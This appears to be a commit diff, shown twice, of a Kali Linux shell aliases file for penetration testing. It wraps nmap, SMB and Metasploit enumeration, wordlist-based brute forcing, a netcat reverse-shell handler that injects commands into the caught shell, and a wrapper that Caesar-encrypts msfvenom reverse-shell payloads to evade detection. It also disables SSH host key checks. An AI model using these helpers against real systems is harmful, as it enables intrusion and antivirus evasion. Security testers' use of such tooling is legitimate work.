daniruiz · April 2, 2025 20:46
diff --git a/kali-shell-aliases-and-functions.sh b/kali-shell-aliases-and-functions.sh
 ##################################################
 # Extra tools
 #   $ sudo apt install -y bloodhound-ce-python chisel dirsearch enum4linux-ng feroxbuster goshs gobuster grc mssqlpwner nishang peass powercat rlwrap seclists shellter sshpass
 # urlencode:
 #   $ sudo apt install gridsite-clients
 # csharp:
 #   $ sudo apt install mono-csharp-shell
 # Install flatpak
 #   -> https://www.kali.org/docs/tools/flatpak/
 # Python2 pip
 #   $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py | python2"
 # Cool Hollywood screensaver ❤️
 #   $ sudo apt install kali-screensaver

 # Sudo without password
 # $ sudo dpkg-reconfigure kali-grant-root

 # Resources
 # accesschk.exe
 # https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

 reset=$'\E[0;0m'
 bold=$'\E[1m'
 red=$'\E[31m'
 green=$'\E[32m'
 blue=$'\E[34m'

 alias sudo='sudo ' # Causes the next word to be checked for alias substitution
 alias xclip='xclip -selection c'
 alias update='sudo sh -c "
  set -e
  export DEBIAN_FRONTEND=noninteractive
  dpkg --configure -a
  apt update
  apt -y --fix-broken --fix-missing full-upgrade
  apt -y autoremove --purge
 "
 echo
 echo Flatpak:
 flatpak update && flatpak remove --unused
 '

 alias rdesktop='rdesktop -k es'
 alias ssh='ssh -o "StrictHostKeyChecking no"'
 alias sshpass='_sshpass(){ sshpass "$@" -o "StrictHostKeyChecking no" }; _sshpass'

 alias gobusterdir='gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -k -u "$@"'
 alias john='john -w=/usr/share/wordlists/rockyou.txt'
 alias nikto='nikto -host'
 alias nmap='sudo grc nmap'
 alias wapiti='wapiti --color --url'
 alias wfuzz='wfuzz -c'
 alias whatweb='whatweb -a 3'
 alias wpscan='wpscan --rua -e ap,at,tt,cb,dbe,u,m --passwords /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt --url'

 alias webserver='goshs -p 80'
 alias smbserver='impacket-smbserver share . -smb2support'

 alias proxy_nmap='sudo proxychains -q grc nmap -v -n -Pn -sT'
 alias proxy_hydra='sudo proxychains -q hydra'
 alias proxy_gobusterdir='HTTP_PROXY=socks5://127.0.0.1:9090/ gobusterdir'


 # ==============================================================================
 ## bloodhound-ce automatizes the installation of bloodhound-ce, runs it and highlights the default password for new installations
 #  -------------
 ## Usage:
 # $ bloodhound-ce
 bloodhound-ce() {
  command -v docker-compose > /dev/null || { sudo apt update && sudo apt -y install docker-compose }
  curl -L https://ghst.ly/getbhce | sudo docker-compose -f - up | grep -E --color=always '#.+#|^' &
  until curl http://127.0.0.1:8080 &>/dev/null; do printf ...; sleep 1; done
  xdg-open http://127.0.0.1:8080
 }


 # ==============================================================================
 ## wordlists lists useful wordlists and resources
 #  ---------
 ## Usage:
 # $ wordlists
 wordlists() {
  echo "${green}${bold}"
  figlet Wordlists
  echo ${reset}
  echo "${bold}Web server enumeration:${reset}"
  du -h /usr/share/seclists/Discovery/Web-Content/combined_words.txt \
          /usr/share/seclists/Discovery/Web-Content/combined_directories.txt \
  | sed 's/^/ /'
  echo " [i] Useful file extensions: php,asp,aspx,cgi,jsp,ini,config,cfg,xml,htm,html,json,bak,txt,zip"
  echo ""
  echo "${bold}Online credentials:${reset}"
  echo " > /usr/share/seclists/Passwords/probable-v2-top1575.txt"
  echo " > /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt"
  echo ""
  echo "${bold}Password Hash cracking:${reset}"
  echo " > /usr/share/wordlists/rockyou.txt"
  echo "________________________________________________________________________________________"
  command wordlists
 }

 # ==============================================================================
 ## nmapfast runs a quick scan for the specified target, with colors!
 #  --------
 ## Usage:
 # $ nmapfast <target>
 nmapfast() {
  nmap_output=$(mktemp)
  command nmap -n -sS -Pn -T4 --min-rate 1000 -p- -v $1 -oN $nmap_output \
    | sed -u 's|[0-9]\+/tcp|\x1b\[1;32m\0\x1b\[0m|'
  ports=$(cat $nmap_output \
    | grep ^[1-9] \
    | cut -d/ -f1 \
    | xargs \
    | sed 's/ /,/g')
  echo ""
  echo "======================================="
  echo ""
  echo "    PORTS" 
  echo "    -----"
  echo "    ${bold}${red}${ports}${reset}"
  echo ""
  grc nmap -n -Pn -sT -p$ports -sC -sV $1
  echo ""
  echo "======================================="
  echo ""
  command nmap -n -Pn -sU --top-ports 100 -v $1 | sed -u 's|[0-9]\+/udp|\x1b\[1;34m\0\x1b\[0m|'
 }

 # ==============================================================================
 ## smbtest runs all the possible tests to check if a target machine is running an SMB server
 #  -------
 ## Usage:
 # $ smbtest <target>
 smbtest() {
  target=$1
  smbmap_output="$(smbmap -H $target -u %)"
  if ! echo "$smbmap_output" | grep -qF '[!]'; then
    echo "$smbmap_output" \
    | sed 's/WRITE/\x1b\[1;31m\0\x1b[0m/; s/READ/\x1b\[1;32m\0\x1b[0m/;'
  else
    smbclient -L //$target/ -U % --no-pass \
      || smbclient -L //$target/ -U anonymous --no-pass
  fi
  echo
  sudo msfdb init \
    && msfconsole -q -x "\
    use auxiliary/scanner/smb/smb_version; \
    set rhost ${target}; \
    run; \
    vulns ${target}; \
    exit"
 }

 # ==============================================================================
 ## rshell is a netcat wrapper for linux/unix reverse shell connections that handles all the necesary bits to have an interactive shell.
 #  ------
 ## Usage:
 # $ rshell <netcat_parameters...>
 # $ rshell -lp 443
 rshell() {
  local rows cols

  read rows cols < <(stty size)
  stty raw -echo

  # Used ': ; ' to differentiate actual code from injected code (does nothing)
  cat <(cat << 'EOF'
 : ; export TERM=xterm-256color
 : ; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 : ; 
 : ; # Upgrade shell to a proper PTY
 : ; for PYTHON in $(which python python2 python3); do : ; done
 : ; if [ -x "$PYTHON" ]; then
 : ;   [ -x /bin/bash ] && exec "$PYTHON" -c 'import pty; pty.spawn(("/bin/bash", "--rcfile", "/etc/skel/.bashrc", "-p"))'
 : ;   exec "$PYTHON" -c 'import pty; pty.spawn(("/bin/sh",))'
 : ; elif command -v script >/dev/null 2>&1; then
 : ;   exec script -q -c /bin/bash /dev/null
 : ; fi
 : ; 
 : ; # Set terminal size dynamically
 : ; stty rows $rows cols $cols
 : ; 
 : ; # Display system information after connection
 : ; clear; \
 : ; { \
 : ;   . /etc/os-release; \
 : ;   printf "\033[1;32m\==========( \033[1;31m$(whoami)@$(hostname) \033[1;32m)===========/\n"; \
 : ;   printf "\033[1;32m|     \033[1;34mOS\033[0m :: %s\n" "${PRETTY_NAME:-Unknown OS}"; \
 : ;   printf "\033[1;32m| \033[1;34mKernel\033[0m :: %s\n" "$(uname -r -s -m)"; \
 : ;   printf "\033[1;32m| \033[1;34mGroups\033[0m :: %s\n" "$(groups)"; \
 : ;   printf "\033[1;32m\\____________________________________________________________\n\033[0m"; \
 : ;   echo; \
 : ;   ip --color=auto address || ifconfig; \
 : ;   echo; \
 : ; } 2>/dev/null
 EOF
  ) - | nc "$@"

  # Reset terminal settings after exit
  stty sane
 }


 # ==============================================================================
 ## ccaesar_cipher_msfvenom is a wrapper for msfvenom that encrypts the output payload using the caesar cipher
 #  ----------------------
 ## Usage:
 # $ caesar_cipher_msfvenom <key> <msfvenom_parameters . . .>
 # $ caesar_cipher_msfvenom 4 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.164 LPORT=443
 caesar_cipher_msfvenom() {
  KEY=$1
  shift
  payload="$(msfvenom "$@" -f csharp -v buf)"

  echo
  echo

  csharp << EOF
 using System.Text;

 ${payload}

 for (int i = 0; i < buf.Length; i++)
  buf[i] = (byte)(((uint)buf[i] + ${KEY}) & 0xFF);

 StringBuilder hex = new StringBuilder(buf.Length * 2);
 foreach (byte b in buf)
  hex.AppendFormat("0x{0:x2}, ", b);

 Console.WriteLine("byte[] buf = new byte[] { " + hex.ToString().Substring(0, hex.Length - 2) + " };");
 EOF
 }
	##################################################
	# Extra tools
	# $ sudo apt install -y bloodhound-ce-python chisel dirsearch enum4linux-ng feroxbuster goshs gobuster grc mssqlpwner nishang peass powercat rlwrap seclists shellter sshpass
	# urlencode:
	# $ sudo apt install gridsite-clients
	# csharp:
	# $ sudo apt install mono-csharp-shell
	# Install flatpak
	# -> https://www.kali.org/docs/tools/flatpak/
	# Python2 pip
	# $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py \| python2"
	# Cool Hollywood screensaver ❤️
	# $ sudo apt install kali-screensaver

	# Sudo without password
	# $ sudo dpkg-reconfigure kali-grant-root

	# Resources
	# accesschk.exe
	# https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

	reset=$'\E[0;0m'
	bold=$'\E[1m'
	red=$'\E[31m'
	green=$'\E[32m'
	blue=$'\E[34m'

	alias sudo='sudo ' # Causes the next word to be checked for alias substitution
	alias xclip='xclip -selection c'
	alias update='sudo sh -c "
	set -e
	export DEBIAN_FRONTEND=noninteractive
	dpkg --configure -a
	apt update
	apt -y --fix-broken --fix-missing full-upgrade
	apt -y autoremove --purge
	"
	echo
	echo Flatpak:
	flatpak update && flatpak remove --unused
	'

	alias rdesktop='rdesktop -k es'
	alias ssh='ssh -o "StrictHostKeyChecking no"'
	alias sshpass='_sshpass(){ sshpass "$@" -o "StrictHostKeyChecking no" }; _sshpass'

	alias gobusterdir='gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -k -u "$@"'
	alias john='john -w=/usr/share/wordlists/rockyou.txt'
	alias nikto='nikto -host'
	alias nmap='sudo grc nmap'
	alias wapiti='wapiti --color --url'
	alias wfuzz='wfuzz -c'
	alias whatweb='whatweb -a 3'
	alias wpscan='wpscan --rua -e ap,at,tt,cb,dbe,u,m --passwords /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt --url'

	alias webserver='goshs -p 80'
	alias smbserver='impacket-smbserver share . -smb2support'

	alias proxy_nmap='sudo proxychains -q grc nmap -v -n -Pn -sT'
	alias proxy_hydra='sudo proxychains -q hydra'
	alias proxy_gobusterdir='HTTP_PROXY=socks5://127.0.0.1:9090/ gobusterdir'


	# ==============================================================================
	## bloodhound-ce automatizes the installation of bloodhound-ce, runs it and highlights the default password for new installations
	# -------------
	## Usage:
	# $ bloodhound-ce
	bloodhound-ce() {
	command -v docker-compose > /dev/null \|\| { sudo apt update && sudo apt -y install docker-compose }
	curl -L https://ghst.ly/getbhce \| sudo docker-compose -f - up \| grep -E --color=always '#.+#\|^' &
	until curl http://127.0.0.1:8080 &>/dev/null; do printf ...; sleep 1; done
	xdg-open http://127.0.0.1:8080
	}


	# ==============================================================================
	## wordlists lists useful wordlists and resources
	# ---------
	## Usage:
	# $ wordlists
	wordlists() {
	echo "${green}${bold}"
	figlet Wordlists
	echo ${reset}
	echo "${bold}Web server enumeration:${reset}"
	du -h /usr/share/seclists/Discovery/Web-Content/combined_words.txt \
	/usr/share/seclists/Discovery/Web-Content/combined_directories.txt \
	\| sed 's/^/ /'
	echo " [i] Useful file extensions: php,asp,aspx,cgi,jsp,ini,config,cfg,xml,htm,html,json,bak,txt,zip"
	echo ""
	echo "${bold}Online credentials:${reset}"
	echo " > /usr/share/seclists/Passwords/probable-v2-top1575.txt"
	echo " > /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt"
	echo ""
	echo "${bold}Password Hash cracking:${reset}"
	echo " > /usr/share/wordlists/rockyou.txt"
	echo "________________________________________________________________________________________"
	command wordlists
	}

	# ==============================================================================
	## nmapfast runs a quick scan for the specified target, with colors!
	# --------
	## Usage:
	# $ nmapfast <target>
	nmapfast() {
	nmap_output=$(mktemp)
	command nmap -n -sS -Pn -T4 --min-rate 1000 -p- -v $1 -oN $nmap_output \
	\| sed -u 's\|[0-9]\+/tcp\|\x1b\[1;32m\0\x1b\[0m\|'
	ports=$(cat $nmap_output \
	\| grep ^[1-9] \
	\| cut -d/ -f1 \
	\| xargs \
	\| sed 's/ /,/g')
	echo ""
	echo "======================================="
	echo ""
	echo " PORTS"
	echo " -----"
	echo " ${bold}${red}${ports}${reset}"
	echo ""
	grc nmap -n -Pn -sT -p$ports -sC -sV $1
	echo ""
	echo "======================================="
	echo ""
	command nmap -n -Pn -sU --top-ports 100 -v $1 \| sed -u 's\|[0-9]\+/udp\|\x1b\[1;34m\0\x1b\[0m\|'
	}

	# ==============================================================================
	## smbtest runs all the possible tests to check if a target machine is running an SMB server
	# -------
	## Usage:
	# $ smbtest <target>
	smbtest() {
	target=$1
	smbmap_output="$(smbmap -H $target -u %)"
	if ! echo "$smbmap_output" \| grep -qF '[!]'; then
	echo "$smbmap_output" \
	\| sed 's/WRITE/\x1b\[1;31m\0\x1b[0m/; s/READ/\x1b\[1;32m\0\x1b[0m/;'
	else
	smbclient -L //$target/ -U % --no-pass \
	\|\| smbclient -L //$target/ -U anonymous --no-pass
	fi
	echo
	sudo msfdb init \
	&& msfconsole -q -x "\
	use auxiliary/scanner/smb/smb_version; \
	set rhost ${target}; \
	run; \
	vulns ${target}; \
	exit"
	}

	# ==============================================================================
	## rshell is a netcat wrapper for linux/unix reverse shell connections that handles all the necesary bits to have an interactive shell.
	# ------
	## Usage:
	# $ rshell <netcat_parameters...>
	# $ rshell -lp 443
	rshell() {
	local rows cols

	read rows cols < <(stty size)
	stty raw -echo

	# Used ': ; ' to differentiate actual code from injected code (does nothing)
	cat <(cat << 'EOF'
	: ; export TERM=xterm-256color
	: ; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
	: ;
	: ; # Upgrade shell to a proper PTY
	: ; for PYTHON in $(which python python2 python3); do : ; done
	: ; if [ -x "$PYTHON" ]; then
	: ; [ -x /bin/bash ] && exec "$PYTHON" -c 'import pty; pty.spawn(("/bin/bash", "--rcfile", "/etc/skel/.bashrc", "-p"))'
	: ; exec "$PYTHON" -c 'import pty; pty.spawn(("/bin/sh",))'
	: ; elif command -v script >/dev/null 2>&1; then
	: ; exec script -q -c /bin/bash /dev/null
	: ; fi
	: ;
	: ; # Set terminal size dynamically
	: ; stty rows $rows cols $cols
	: ;
	: ; # Display system information after connection
	: ; clear; \
	: ; { \
	: ; . /etc/os-release; \
	: ; printf "\033[1;32m\==========( \033[1;31m$(whoami)@$(hostname) \033[1;32m)===========/\n"; \
	: ; printf "\033[1;32m\| \033[1;34mOS\033[0m :: %s\n" "${PRETTY_NAME:-Unknown OS}"; \
	: ; printf "\033[1;32m\| \033[1;34mKernel\033[0m :: %s\n" "$(uname -r -s -m)"; \
	: ; printf "\033[1;32m\| \033[1;34mGroups\033[0m :: %s\n" "$(groups)"; \
	: ; printf "\033[1;32m\\____________________________________________________________\n\033[0m"; \
	: ; echo; \
	: ; ip --color=auto address \|\| ifconfig; \
	: ; echo; \
	: ; } 2>/dev/null
	EOF
	) - \| nc "$@"

	# Reset terminal settings after exit
	stty sane
	}


	# ==============================================================================
	## ccaesar_cipher_msfvenom is a wrapper for msfvenom that encrypts the output payload using the caesar cipher
	# ----------------------
	## Usage:
	# $ caesar_cipher_msfvenom <key> <msfvenom_parameters . . .>
	# $ caesar_cipher_msfvenom 4 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.164 LPORT=443
	caesar_cipher_msfvenom() {
	KEY=$1
	shift
	payload="$(msfvenom "$@" -f csharp -v buf)"

	echo
	echo

	csharp << EOF
	using System.Text;

	${payload}

	for (int i = 0; i < buf.Length; i++)
	buf[i] = (byte)(((uint)buf[i] + ${KEY}) & 0xFF);

	StringBuilder hex = new StringBuilder(buf.Length * 2);
	foreach (byte b in buf)
	hex.AppendFormat("0x{0:x2}, ", b);

	Console.WriteLine("byte[] buf = new byte[] { " + hex.ToString().Substring(0, hex.Length - 2) + " };");
	EOF
	}